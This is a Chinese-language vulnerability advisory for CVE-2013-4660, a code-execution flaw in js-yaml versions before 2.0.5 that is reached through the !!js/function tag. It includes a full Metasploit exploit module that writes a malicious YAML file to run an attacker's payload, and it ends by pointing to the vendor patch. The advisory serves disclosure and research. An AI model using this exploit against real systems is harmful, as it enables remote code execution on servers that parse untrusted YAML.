发布日期:2013-07-01
更新日期:2013-10-14
受影响系统:
js-yaml js-yaml 2.0.4
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 60867
CVE(CAN) ID: CVE-2013-4660
js-yaml是YAML 1.2的JavaScript解析器和串联器。
Node.js的js-yaml模块2.0.5之前版本在解析输入时,没有考虑不安全的!!js/function旗标,可使远程攻击者通过特制的字符串触发eval操作,执行任意代码。
<*来源:Neal Poole
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Nodejs js-yaml load() Code Exec',
'Description' => %q{
For node.js applications that parse user-supplied YAML input
using the
load() function from the 'js-yaml' package < 2.0.5, specifying a
self-executing
function allows us to execute arbitrary javascript code.
},
'Author' => ['joev <jvennix[at]rapid7.com>'],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-4660'],
['URL',
'https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/']
],
'Platform' => 'nodejs',
'Arch' => ARCH_NODEJS,
'Privileged' => false,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => 'Jun 28 2013',
'DefaultTarget' => 0))
register_options([
OptString.new('FILENAME', [ true, 'The file name.', 'msf.yml'])
], self.class)
end
def exploit
p = payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file...")
file_create("a: !!js/function >\n (function(){ #{p} })();")
end
end
建议:
--------------------------------------------------------------------------------
厂商补丁:
js-yaml
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: